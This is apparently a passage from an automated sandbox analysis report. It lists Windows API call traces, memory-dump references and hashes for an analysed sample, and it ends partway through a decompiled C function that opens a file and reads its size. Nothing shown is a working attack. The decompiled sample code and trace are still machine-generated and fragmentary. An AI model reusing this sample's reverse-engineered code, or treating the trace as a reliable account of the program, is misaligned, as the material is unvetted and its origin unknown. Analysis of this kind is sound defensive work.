                                                                                                                                                                                                                                                                • InflateRect.USER32(?,000000FF,000000FF), ref: 00135ED7
                                                                                                                                                                                                                                                                • GetNearestPaletteIndex.GDI32(?,?), ref: 00135F00
                                                                                                                                                                                                                                                                • FillRect.USER32(?,?,?), ref: 00135F22
                                                                                                                                                                                                                                                                • InflateRect.USER32(?,000000FE,000000FE), ref: 00135F49
                                                                                                                                                                                                                                                                • FillRect.USER32(?,?,-00000098), ref: 00135FB9
                                                                                                                                                                                                                                                                • InflateRect.USER32(?,000000FF,000000FF), ref: 00136004
                                                                                                                                                                                                                                                                • InflateRect.USER32(?,000000FF,000000FF), ref: 001360CC
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.551374961.00000000000D6000.00000020.00020000.sdmp, Offset: 000D6000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_d6000_sample4.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Rect$Inflate$Fill$H_prolog3IndexNearestPalette
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 1120616146-0
                                                                                                                                                                                                                                                                • Opcode ID: fedab2699c92ce9df6379543b48741e9d5a1fcdfc9031e4d1a01f5a8adb741aa
                                                                                                                                                                                                                                                                • Instruction ID: d00f6e3e1a7b8ea9b00b142ed192364c6eeebafd2d210f474a39b1d1e2db7da8
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: fedab2699c92ce9df6379543b48741e9d5a1fcdfc9031e4d1a01f5a8adb741aa
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5CC1A031900219AFCF05EFA4DD45A9EB7BAFF16320F114269F815AB2A1CB71AD15CF90
                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • __EH_prolog3_GS.LIBCMT ref: 00151FF4
                                                                                                                                                                                                                                                                • GetObjectW.GDI32(?,00000018,?,000000A8,00152661,?,00000010,00000038,00151552,?,?,00000000,00000008,0012FBD8,?), ref: 0015201D
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.551374961.00000000000D6000.00000020.00020000.sdmp, Offset: 000D6000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_d6000_sample4.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: H_prolog3_Object
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2214263146-0
                                                                                                                                                                                                                                                                • Opcode ID: b903899b26efa7316facc4f96d50cf6394027b30112f0c1e2cf772120c6bbeb6
                                                                                                                                                                                                                                                                • Instruction ID: 2d3c356675091e973326153e791add79c342a7ec419e1985b333c1a5c625e9d4
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b903899b26efa7316facc4f96d50cf6394027b30112f0c1e2cf772120c6bbeb6
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2B813D75E00229CBDB24CFA9CC84AAEBBB5FF99301F108169E919AB351DB309D45CF50
                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • __EH_prolog3_GS.LIBCMT ref: 0015161A
                                                                                                                                                                                                                                                                • GetModuleFileNameW.KERNEL32(00000000,?,00000104,000D35C0,00000000,000D9C68,00000000,000D1AE4,00000000,00000028,?,00000A38,00152648,?,00000000,00000038), ref: 001516B1
                                                                                                                                                                                                                                                                • CreateFileW.KERNEL32(00000028,80000000,00000001,00000000,00000003,00000000,00000000,000D1AE4,00000000,00000028,?,00000A38,00152648,?,00000000,00000038), ref: 00151753
                                                                                                                                                                                                                                                                • GetFileSize.KERNEL32(00000000,00000000,?,0014EF83,?,00000000,?,?,00151B80,?,00000000,00000000), ref: 00151763
                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000,?,0014EF83,?,00000000,?,?,00151B80,?,00000000,00000000), ref: 0015176C
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.551374961.00000000000D6000.00000020.00020000.sdmp, Offset: 000D6000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_d6000_sample4.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: File$CloseCreateH_prolog3_HandleModuleNameSize
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2198494350-0
                                                                                                                                                                                                                                                                • Opcode ID: 6a13197302a0096983037d53da97ab68f352c5334aaa3aea36c4fa077c1f6564
                                                                                                                                                                                                                                                                • Instruction ID: 6c9ba2099a2c373feb29826066c94dd753edc867949f6766d3fa6a2bfcba21fe
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6a13197302a0096983037d53da97ab68f352c5334aaa3aea36c4fa077c1f6564
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F361D772500214BACB21AF24DC89FDF777CEF96710F1041A9F965AB181DB709A89CB61
                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • __EH_prolog3_GS.LIBCMT ref: 0011F6B4
                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,00000000,00000000,00000080), ref: 0011F6FA
                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,00000000,00000000,?), ref: 0011F726
                                                                                                                                                                                                                                                                • ValidateRect.USER32(?,00000000), ref: 0011F735
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.551374961.00000000000D6000.00000020.00020000.sdmp, Offset: 000D6000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_d6000_sample4.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: MessageSend$H_prolog3_RectValidate
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 3261311288-0
                                                                                                                                                                                                                                                                • Opcode ID: 7059600f3a36de2cfd74ad0b22df66d0d877b6356014572d8ebdc7ca52684909
                                                                                                                                                                                                                                                                • Instruction ID: 5a2409ee751115ce18a1c9b27ae320f398819930c8b7784db672e3ace6935f6d
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7059600f3a36de2cfd74ad0b22df66d0d877b6356014572d8ebdc7ca52684909
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2D415C71A10619DFCF25AFA0EC95AAEBAB6FF98300F14443EE04A93171DB319951DF20
                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.551374961.00000000000D6000.00000020.00020000.sdmp, Offset: 000D6000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_d6000_sample4.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: _strrchr
                                                                                                                                                                                                                                                                • String ID: i%$i%$i%
                                                                                                                                                                                                                                                                • API String ID: 3213747228-2370788599
                                                                                                                                                                                                                                                                • Opcode ID: 573638e945006dd7fead8af1140409bd4de751500fa2625d6b117167ccf43470
                                                                                                                                                                                                                                                                • Instruction ID: 5fc503a08f1a373378668cb5940c1665aa7882c5c044dbfa8885896184bb4abb
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 573638e945006dd7fead8af1140409bd4de751500fa2625d6b117167ccf43470
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5BB144729213469FDB158F28C8817AEBBF5EF45311F34806ADC45EB241E2348D69CBA8
                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • __EH_prolog3.LIBCMT ref: 001519E7
                                                                                                                                                                                                                                                                • GetObjectW.GDI32(00000000,00000018,?), ref: 00151AE2
                                                                                                                                                                                                                                                                • DeleteObject.GDI32(00000000), ref: 00151AEF
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.551374961.00000000000D6000.00000020.00020000.sdmp, Offset: 000D6000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_d6000_sample4.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Object$DeleteH_prolog3
                                                                                                                                                                                                                                                                • String ID: $ 0
                                                                                                                                                                                                                                                                • API String ID: 657949336-2970217694
                                                                                                                                                                                                                                                                • Opcode ID: 0fb76185650b2552ca7faf60ac7bafc35f735624db93d9a6ddab1b69e152f855
                                                                                                                                                                                                                                                                • Instruction ID: 20644faa02fdc9f6e4c43b0e280d51a1237e0010b0de721d766d00e220dd2d5c
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0fb76185650b2552ca7faf60ac7bafc35f735624db93d9a6ddab1b69e152f855
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D9516E71901616FFCB16AFA0C944BEEB775FF14305F014529EC36AB191EB709A58CBA0
                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • __EH_prolog3.LIBCMT ref: 00177B0E
                                                                                                                                                                                                                                                                • GetObjectW.GDI32(?,00000018,?,00000048,00152D74,?,000000FF), ref: 00177B28
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.551374961.00000000000D6000.00000020.00020000.sdmp, Offset: 000D6000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_d6000_sample4.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: H_prolog3Object
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 133200376-3916222277
                                                                                                                                                                                                                                                                • Opcode ID: 61cdb3f6276a2d5501d278ec5a423c449466d7d53b4fe3192c00787c4b984581
                                                                                                                                                                                                                                                                • Instruction ID: e626e368713213f290936c080d866e99d2a79b5c629654bd33b79cbcb8e347af
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 61cdb3f6276a2d5501d278ec5a423c449466d7d53b4fe3192c00787c4b984581
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C941AE32D0411AAFDB12AFA0EC44AFEBB75EF58310F258024F416A72A0DB718D55DBA0
                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • CheckMenuItem.USER32(?,?,00000000), ref: 0011D516
                                                                                                                                                                                                                                                                  • Part of subcall function 001266DE: GetWindowTextW.USER32(?,?,00000100), ref: 00126734
                                                                                                                                                                                                                                                                  • Part of subcall function 001266DE: lstrcmpW.KERNEL32(?,0011D623,?,00000000), ref: 00126746
                                                                                                                                                                                                                                                                  • Part of subcall function 001266DE: SetWindowTextW.USER32(?,0011D623), ref: 00126752
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000087,00000000,00000000), ref: 0011D531
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,000000F1,?,00000000), ref: 0011D54E
                                                                                                                                                                                                                                                                • SetMenuItemBitmaps.USER32(?,?,00000400,00000000,00287D88), ref: 0011D5BA
                                                                                                                                                                                                                                                                • SetMenuItemInfoW.USER32(?,?,00000001,?), ref: 0011D60A
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.551374961.00000000000D6000.00000020.00020000.sdmp, Offset: 000D6000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_d6000_sample4.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: ItemMenu$MessageSendTextWindow$BitmapsCheckInfolstrcmp
                                                                                                                                                                                                                                                                • String ID: 0$@
                                                                                                                                                                                                                                                                • API String ID: 72408025-1545510068
                                                                                                                                                                                                                                                                • Opcode ID: 0a10d1d628d214a8f0e041593f2ad71d9e12c0b734874c73569fa43309b9b262
                                                                                                                                                                                                                                                                • Instruction ID: 551e7e266a71ca874beb80b4d8e9e555c82a92eecc9e821d81d4bb3d06ae473d
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0a10d1d628d214a8f0e041593f2ad71d9e12c0b734874c73569fa43309b9b262
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5941CE31600215EFDB299F69E884FAAB7BAFF44704F248639F5089B550DB71E891CB90
                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetModuleHandleW.KERNEL32(000D1AAC,?,00000000), ref: 0011EEE2
                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,000D1AC8), ref: 0011EEF2
                                                                                                                                                                                                                                                                • RtlEncodePointer.NTDLL(00000000), ref: 0011EEFB
                                                                                                                                                                                                                                                                • RtlDecodePointer.NTDLL(002897AC), ref: 0011EF09
                                                                                                                                                                                                                                                                • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00000000), ref: 0011EF1D
                                                                                                                                                                                                                                                                • GetSystemDirectoryW.KERNEL32(?,00000105), ref: 0011EF32
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.551374961.00000000000D6000.00000020.00020000.sdmp, Offset: 000D6000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_d6000_sample4.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Pointer$AddressDecodeDirectoryEncodeHandleLibraryLoadModuleProcSystem
                                                                                                                                                                                                                                                                • String ID: \
                                                                                                                                                                                                                                                                • API String ID: 4227638471-2967466578
                                                                                                                                                                                                                                                                • Opcode ID: 9a1e743c2e7bd7263ee9863997bc083b796d918cfe8184df0d9e941dd2c8159c
                                                                                                                                                                                                                                                                • Instruction ID: 43c8e74cf84d1f9d19047c02ddf334413f8582189d7ee0f2614189f8c3925d9d
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9a1e743c2e7bd7263ee9863997bc083b796d918cfe8184df0d9e941dd2c8159c
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5F21C331A0132ABBCB24ABE5AC4DFEA7BECAB15710F190475FC05D3140EB70D9958B91
                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetClientRect.USER32(?,?), ref: 001222AF
                                                                                                                                                                                                                                                                • BeginDeferWindowPos.USER32(00000008), ref: 001222C5
                                                                                                                                                                                                                                                                • GetTopWindow.USER32(?), ref: 001222D7
                                                                                                                                                                                                                                                                • GetDlgCtrlID.USER32(00000000), ref: 001222E0
                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,00000361,00000000,00000000), ref: 00122318
                                                                                                                                                                                                                                                                • GetWindow.USER32(00000000,00000002), ref: 00122321
                                                                                                                                                                                                                                                                • CopyRect.USER32(?,?), ref: 0012233C
                                                                                                                                                                                                                                                                • EndDeferWindowPos.USER32(00000000), ref: 001223C8
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.551374961.00000000000D6000.00000020.00020000.sdmp, Offset: 000D6000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_d6000_sample4.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Window$DeferRect$BeginClientCopyCtrlMessageSend
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 1228040700-0
                                                                                                                                                                                                                                                                • Opcode ID: bf80bad8b17d7c890c29ac85d7c59a832e06cc22e5cd951aad9faf4a08415532
                                                                                                                                                                                                                                                                • Instruction ID: 936817ae08ad80e03f108323ffefd3f176a1d7901cb461288095ca42b7f15d9a
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: bf80bad8b17d7c890c29ac85d7c59a832e06cc22e5cd951aad9faf4a08415532
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D8512832900229EFCF15DFA4E884BEEB7B5BF49311F154069E805BB250DB79AD60CB64
                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetClientRect.USER32(?,?), ref: 00134A0C
                                                                                                                                                                                                                                                                • ClientToScreen.USER32(?,?), ref: 00134A25
                                                                                                                                                                                                                                                                • PtInRect.USER32(?,?,?), ref: 00134A35
                                                                                                                                                                                                                                                                • WindowFromPoint.USER32(?,?), ref: 00134A49
                                                                                                                                                                                                                                                                • SetCapture.USER32(?), ref: 00134AAF
                                                                                                                                                                                                                                                                • ReleaseCapture.USER32 ref: 00134AF9
                                                                                                                                                                                                                                                                • InvalidateRect.USER32(?,00000000,00000001), ref: 00134B14
                                                                                                                                                                                                                                                                • UpdateWindow.USER32(?), ref: 00134B1D
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.551374961.00000000000D6000.00000020.00020000.sdmp, Offset: 000D6000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_d6000_sample4.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Rect$CaptureClientWindow$FromInvalidatePointReleaseScreenUpdate
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 1999979895-0
                                                                                                                                                                                                                                                                • Opcode ID: 0da16de9e0a83e534d16bed70e8c8c2bdff0eac92dbe84caddf35f5c43095f7f
                                                                                                                                                                                                                                                                • Instruction ID: e3e96be3f7032c484d633bc01584e247bfb320981f94cd78c2b89a0cb87d919e
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0da16de9e0a83e534d16bed70e8c8c2bdff0eac92dbe84caddf35f5c43095f7f
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C8415972900705DFDB209FA5D948BABF7F9FF99302F10452EE49A82164DB70A985CF11
                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetWindowRect.USER32(?,?), ref: 0013B233
                                                                                                                                                                                                                                                                • InvalidateRect.USER32(?,00000000,00000001), ref: 0013B276
                                                                                                                                                                                                                                                                • TrackPopupMenu.USER32(?,00000180,?,?,00000000,?,00000000), ref: 0013B2CF
                                                                                                                                                                                                                                                                • GetParent.USER32(?), ref: 0013B2DE
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000111,?,?), ref: 0013B310
                                                                                                                                                                                                                                                                • InvalidateRect.USER32(?,00000000,00000001,00000000), ref: 0013B330
                                                                                                                                                                                                                                                                • UpdateWindow.USER32(?), ref: 0013B339
                                                                                                                                                                                                                                                                • ReleaseCapture.USER32 ref: 0013B348
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.551374961.00000000000D6000.00000020.00020000.sdmp, Offset: 000D6000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_d6000_sample4.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Rect$InvalidateWindow$CaptureMenuMessageParentPopupReleaseSendTrackUpdate
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2465089168-0
                                                                                                                                                                                                                                                                • Opcode ID: cd00fcebacaa6f4777fe045b196449570b3c25c00ebe0b2d02a0b2a40594ba7c
                                                                                                                                                                                                                                                                • Instruction ID: 66af3defb1c13b0ffa3da6cfe9a6d3a1c8d1ab6fdf65656d7056de1ea5206386
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: cd00fcebacaa6f4777fe045b196449570b3c25c00ebe0b2d02a0b2a40594ba7c
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 45410D71A04716FFDB189FA1D888AAAF7B9FB49300F10022EE55996650DB747820CF91
                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GlobalSize.KERNEL32(?), ref: 0011A3DC
                                                                                                                                                                                                                                                                • GlobalAlloc.KERNEL32(00002002,00000000,?,?,80070057,?,00000000,?,?,0011A352,00000000,00000000,?,?,0011C058,?), ref: 0011A3F4
                                                                                                                                                                                                                                                                • GlobalSize.KERNEL32(00000000), ref: 0011A405
                                                                                                                                                                                                                                                                • GlobalFix.KERNEL32(?), ref: 0011A413
                                                                                                                                                                                                                                                                • GlobalFix.KERNEL32(00000000), ref: 0011A41C
                                                                                                                                                                                                                                                                • GlobalSize.KERNEL32(00000000), ref: 0011A429
                                                                                                                                                                                                                                                                • GlobalUnWire.KERNEL32(00000000), ref: 0011A43A
                                                                                                                                                                                                                                                                • GlobalUnWire.KERNEL32(?), ref: 0011A443
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.551374961.00000000000D6000.00000020.00020000.sdmp, Offset: 000D6000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_d6000_sample4.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Global$Size$Wire$Alloc
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 3936089190-0
                                                                                                                                                                                                                                                                • Opcode ID: 62c2f63a48a43c5293de222402392e958c79cea2941df5cf7c989598e0341c87
                                                                                                                                                                                                                                                                • Instruction ID: 868d1f3607625eea2128bef2d69945f60184571cfd376325b01d648e728fb2b7
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 62c2f63a48a43c5293de222402392e958c79cea2941df5cf7c989598e0341c87
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9C31D271601204BBCB18BBA5EC8CCAEBB69FF993607644079FD1682211DB719D909AA1
                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • __EH_prolog3_catch.LIBCMT ref: 00118D80
                                                                                                                                                                                                                                                                • RtlEnterCriticalSection.NTDLL(?), ref: 00118D91
                                                                                                                                                                                                                                                                • TlsGetValue.KERNEL32(?,?,00000000,?,00000004,001192CB,00118752,001192F4,0011B475,00119580,?,001196B4,?,?,00119872,00000000), ref: 00118DAD
                                                                                                                                                                                                                                                                • LocalAlloc.KERNEL32(00000000,00000000,00000000,00000010,?,?,00000000,?,00000004,001192CB,00118752,001192F4,0011B475,00119580,?,001196B4), ref: 00118E1D
                                                                                                                                                                                                                                                                • LocalReAlloc.KERNEL32(?,00000000,00000002,00000000,00000010,?,?,00000000,?,00000004,001192CB,00118752,001192F4,0011B475,00119580), ref: 00118E37
                                                                                                                                                                                                                                                                • RtlLeaveCriticalSection.NTDLL(00119872), ref: 00118E46
                                                                                                                                                                                                                                                                • TlsSetValue.KERNEL32(?,00000000), ref: 00118E76
                                                                                                                                                                                                                                                                • RtlLeaveCriticalSection.NTDLL(?), ref: 00118EAD
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.551374961.00000000000D6000.00000020.00020000.sdmp, Offset: 000D6000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_d6000_sample4.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: CriticalSection$AllocLeaveLocalValue$EnterH_prolog3_catch
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2715462074-0
                                                                                                                                                                                                                                                                • Opcode ID: 7134a0d02df77f70226f114e3eb595fbabd7cee6d16d04e5e7787465dcbb6a99
                                                                                                                                                                                                                                                                • Instruction ID: f58c4a9480cb30eb90235479296ffae12efcff4cb9402f61ddc216014611d31d
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7134a0d02df77f70226f114e3eb595fbabd7cee6d16d04e5e7787465dcbb6a99
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: CF31AC70500B05EFDB28AF64E8899AAF7B4FF90310B20C63DE51697690DF71E990CB90
                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • ScreenToClient.USER32(?,?), ref: 001B93BB
                                                                                                                                                                                                                                                                • GetParent.USER32(?), ref: 001B93D2
                                                                                                                                                                                                                                                                • GetClientRect.USER32(?,?), ref: 001B9416
                                                                                                                                                                                                                                                                • MapWindowPoints.USER32(?,?,?,00000002), ref: 001B9428
                                                                                                                                                                                                                                                                • PtInRect.USER32(?,?,?), ref: 001B9438
                                                                                                                                                                                                                                                                • GetClientRect.USER32(?,?), ref: 001B9465
                                                                                                                                                                                                                                                                • MapWindowPoints.USER32(?,?,?,00000002), ref: 001B9477
                                                                                                                                                                                                                                                                • PtInRect.USER32(?,?,?), ref: 001B9487
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.551374961.00000000000D6000.00000020.00020000.sdmp, Offset: 000D6000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_d6000_sample4.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Rect$Client$PointsWindow$ParentScreen
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 1944725958-0
                                                                                                                                                                                                                                                                • Opcode ID: 5b8f4e8db2b17dac9cb70795f1a0ef38bdd24bcfc95f900918fbe828dea1afe3
                                                                                                                                                                                                                                                                • Instruction ID: 8fb5b59eba4a5d004dae13b33cff9870d86db7d7e6a5846b0195aeab8d275511
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5b8f4e8db2b17dac9cb70795f1a0ef38bdd24bcfc95f900918fbe828dea1afe3
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 54317A32A00119AFCF11EFA4DD489EEBBB9FF49700B114169EA06D7260EB71DD028B90
                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                C-Code - Quality: 95%
                                                                                                                                                                                                                                                                			E000D143A(void** __edx, long* _a4) {
                                                                                                                                                                                                                                                                				long _v4;
                                                                                                                                                                                                                                                                				signed int _t7;
                                                                                                                                                                                                                                                                				void* _t10;
                                                                                                                                                                                                                                                                				signed int _t11;
                                                                                                                                                                                                                                                                				signed int _t13;
                                                                                                                                                                                                                                                                				long* _t20;
                                                                                                                                                                                                                                                                				CHAR* _t21;
                                                                                                                                                                                                                                                                				void* _t24;
                                                                                                                                                                                                                                                                				long _t26;
                                                                                                                                                                                                                                                                				void** _t27;
                                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                                				_t26 = 1;
                                                                                                                                                                                                                                                                				_t27 = __edx;
                                                                                                                                                                                                                                                                				_t24 = CreateFileA(_t21, 0x80000000, 1, 0, 3, 0x80, 0);
                                                                                                                                                                                                                                                                				if(_t24 == 0xffffffff) {
                                                                                                                                                                                                                                                                					return 0;
                                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                                				_t7 = GetFileSize(_t24, 0);
                                                                                                                                                                                                                                                                				_t20 = _a4;
                                                                                                                                                                                                                                                                				 *_t20 = _t7;
                                                                                                                                                                                                                                                                				if(_t7 != 0) {
